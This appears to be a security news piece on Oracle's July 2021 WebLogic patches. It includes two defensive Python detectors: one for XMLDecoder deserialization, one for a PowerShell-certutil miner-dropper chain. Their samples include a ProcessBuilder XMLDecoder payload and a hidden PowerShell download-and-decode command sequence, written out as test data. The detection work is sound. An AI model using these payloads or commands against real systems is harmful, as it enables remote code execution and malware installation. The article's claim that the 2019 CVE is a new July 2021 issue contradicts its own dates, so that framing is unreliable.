New Oracle WebLogic Server vulnerabilities were just reported with the Critical Patch Update for July 2021. The update fixes 342 issues across multiple Oracle products, some of which are remotely exploitable and would let attackers take control of vulnerable systems.
CVE-2019-2729 in Oracle WebLogic Server Web Services
The most critical issue appears to be CVE-2019-2729, a deserialization flaw via XMLDecoder in Oracle WebLogic Server Web Services. XMLDecoder rebuilds arbitrary Java objects from an XML document, so an attacker who can feed a crafted document to it can have the server instantiate classes and call methods of the attacker's choosing. The bug is exploitable remotely without any authentication: it may be exploited over a network without the need for a username and password, Oracle noted in its advisory.
“Due to the severity of this vulnerability, Oracle strongly recommends that customers apply the updates provided by this Security Alert as soon as possible,” the company added. The vulnerability was first reported in 2019, when it was addressed in an out-of-band patch.
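The following is an added example, not code from the article or from Oracle, showing the kind of check a WAF or request-inspection hook can run on SOAP bodies to catch XMLDecoder deserialization abuse of the sort described above. An XMLDecoder document always has a `java` root element with `class="java.beans.XMLDecoder"` and builds objects through `object`, `new`, `array` and `void` elements; that format is part of the JDK. The allowlist of harmless value classes, the denylist of executable classes, and the two sample SOAP bodies are constructed for this example.

```python
"""Flag XMLDecoder documents embedded in SOAP requests that instantiate
executable classes. Added example, not Oracle code; allowlist/denylist
and sample bodies are assumptions for illustration."""
import xml.etree.ElementTree as ET

# Plain value types a legitimate XMLDecoder document might carry (assumed).
ALLOWED_CLASSES = {
    "java.lang.String", "java.lang.Integer", "java.lang.Long", "java.lang.Boolean",
    "java.lang.Double", "java.util.HashMap", "java.util.ArrayList", "java.util.Properties",
}
# Classes that give code execution when instantiated or invoked.
DANGEROUS_CLASSES = {
    "java.lang.ProcessBuilder", "java.lang.Runtime", "javax.script.ScriptEngineManager",
}
DANGEROUS_METHODS = {"start", "exec", "eval"}


def _local(tag):
    """Strip an ElementTree namespace prefix: '{ns}object' -> 'object'."""
    return tag.rsplit("}", 1)[-1]


def inspect_xmldecoder(body):
    """Return {'decoder_present': bool, 'alerts': [str]} for one request body."""
    result = {"decoder_present": False, "alerts": []}
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        result["alerts"].append("unparseable XML")
        return result
    for node in root.iter():
        name = _local(node.tag)
        if name == "java" and node.get("class") == "java.beans.XMLDecoder":
            result["decoder_present"] = True
        elif name in ("object", "new", "array"):
            cls = node.get("class")
            if cls in DANGEROUS_CLASSES:
                result["alerts"].append("instantiates dangerous class %s" % cls)
            elif cls and cls not in ALLOWED_CLASSES:
                result["alerts"].append("instantiates non-allowlisted class %s" % cls)
        elif name == "void" and node.get("method") in DANGEROUS_METHODS:
            result["alerts"].append("invokes method %s" % node.get("method"))
        elif name == "class" and (node.text or "").strip() in DANGEROUS_CLASSES:
            result["alerts"].append("references dangerous class %s" % node.text.strip())
    return result


# Constructed sample: a SOAP header carrying a harmless XMLDecoder string.
BENIGN_BODY = (
    '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">'
    '<soapenv:Header><ctx:Context xmlns:ctx="urn:example:ctx">'
    '<java version="1.8.0" class="java.beans.XMLDecoder"><string>tenant-42</string></java>'
    '</ctx:Context></soapenv:Header><soapenv:Body/></soapenv:Envelope>'
)

# Constructed sample: the same header, but the document builds a ProcessBuilder.
MALICIOUS_BODY = (
    '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">'
    '<soapenv:Header><ctx:Context xmlns:ctx="urn:example:ctx">'
    '<java version="1.8.0" class="java.beans.XMLDecoder">'
    '<object class="java.lang.ProcessBuilder">'
    '<array class="java.lang.String" length="1"><void index="0"><string>id</string></void></array>'
    '<void method="start"/></object></java>'
    '</ctx:Context></soapenv:Header><soapenv:Body/></soapenv:Envelope>'
)

if __name__ == "__main__":
    for label, body in (("benign", BENIGN_BODY), ("malicious", MALICIOUS_BODY)):
        print(label, inspect_xmldecoder(body))
```

For production use, parse untrusted XML with a hardened parser (for example defusedxml) rather than bare ElementTree, and treat a mere `decoder_present` hit on an endpoint that should never receive XMLDecoder documents as worth alerting on by itself.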
Oracle also fixed six other issues in WebLogic Server, three of which (CVE-2021-2394, CVE-2021-2397 and CVE-2021-2382) are rated 9.8 out of 10 on the CVSS scale. Here’s the full list: CVE-2021-2394, CVE-2021-2397, CVE-2021-2382, CVE-2021-2378, CVE-2021-2376, and CVE-2021-2403.
Oracle has fixed many flaws in its products over the years. One of them, CVE-2019-2725, also in Oracle WebLogic Server, was abused in 2019 by attackers to drop Monero miners. Using the flaw, remote attackers could run a PowerShell command on the server that downloaded a file disguised as a certificate to the host. The certificate utility (certutil) was then used to decode that file, and the decoded result was decompressed to yield the actual payload.
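That post-exploitation chain is easier to catch than the exploit itself, because each step shows up as a process-creation event. The following is an added example, not code from the article or from Oracle, that correlates such events per host: a WebLogic Java process spawning a shell, PowerShell fetching a file, certutil decoding it, and an archive tool unpacking the result. The event schema (`host`, `ts`, `image`, `parent_image`, `cmdline`) is an assumed normalised form of endpoint telemetry, and all sample events are constructed.

```python
"""Correlate process-creation events into the miner-dropper chain described
above. Added example, not from the original article; the field names and the
sample events are assumptions for illustration."""
import json
from collections import defaultdict
from datetime import datetime, timedelta

# Expected order of the chain.
STAGES = ("spawn", "download", "decode", "unpack")
SHELLS = ("powershell.exe", "pwsh.exe", "cmd.exe")
DOWNLOAD_MARKERS = ("downloadfile", "downloadstring", "invoke-webrequest", "iwr ", "http://", "https://")


def stage_of(ev):
    """Return the set of chain stages one event satisfies (may be several)."""
    image = ev["image"].lower()
    parent = ev["parent_image"].lower()
    cmd = ev["cmdline"].lower()
    stages = set()
    if image.endswith(SHELLS) and parent.endswith(("java.exe", "javaw.exe")):
        stages.add("spawn")          # WebLogic's JVM should not launch shells
    if image.endswith(("powershell.exe", "pwsh.exe")) and any(m in cmd for m in DOWNLOAD_MARKERS):
        stages.add("download")
    if image.endswith("certutil.exe") and "-decode" in cmd:
        stages.add("decode")         # certutil used as a base64 decoder
    if image.endswith(("unzip.exe", "7z.exe", "tar.exe")) or "expand-archive" in cmd:
        stages.add("unpack")
    return stages


def find_chains(lines, window=timedelta(minutes=10)):
    """Map host -> list of chain stages reached, in order, within the window."""
    by_host = defaultdict(list)
    for line in lines:
        ev = json.loads(line)
        ev["ts"] = datetime.fromisoformat(ev["ts"])
        by_host[ev["host"]].append(ev)
    report = {}
    for host, evs in by_host.items():
        evs.sort(key=lambda e: e["ts"])
        reached, start = [], None
        for ev in evs:
            if start is not None and ev["ts"] - start > window:
                reached, start = [], None      # stale partial chain, start over
            stages = stage_of(ev)
            # One event may satisfy consecutive stages (shell spawn + download).
            while len(reached) < len(STAGES) and STAGES[len(reached)] in stages:
                if start is None:
                    start = ev["ts"]
                reached.append(STAGES[len(reached)])
        report[host] = reached
    return report


def alerting_hosts(report, min_stages=3):
    """Hosts that progressed far enough along the chain to warrant an alert."""
    return sorted(h for h, stages in report.items() if len(stages) >= min_stages)


# Constructed sample telemetry (JSON lines, one event per line).
SAMPLE_EVENTS = [
    {"host": "wls-prod-01", "ts": "2021-07-21T10:00:00",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Oracle\Middleware\jdk\bin\java.exe",
     "cmdline": "powershell -nop -w hidden -c (New-Object Net.WebClient).DownloadFile('http://203.0.113.7/x.txt','C:\\Windows\\Temp\\x.txt')"},
    {"host": "wls-prod-01", "ts": "2021-07-21T10:00:05",
     "image": r"C:\Windows\System32\certutil.exe",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"certutil -decode C:\Windows\Temp\x.txt C:\Windows\Temp\x.zip"},
    {"host": "wls-prod-01", "ts": "2021-07-21T10:00:09",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell Expand-Archive -Path C:\Windows\Temp\x.zip -DestinationPath C:\Windows\Temp\x"},
    {"host": "wls-prod-02", "ts": "2021-07-21T10:02:00",
     "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Oracle\Middleware\jdk\bin\java.exe",
     "cmdline": "cmd /c hostname"},
]
SAMPLE_LINES = [json.dumps(e) for e in SAMPLE_EVENTS]

if __name__ == "__main__":
    report = find_chains(SAMPLE_LINES)
    print(report)
    print("alert:", alerting_hosts(report))
```

The stage-ordering and the time window keep a lone `certutil -decode` run by an administrator from triggering the full-chain alert, while a Java process that merely spawns `cmd.exe` still shows up as a one-stage partial chain worth reviewing on its own.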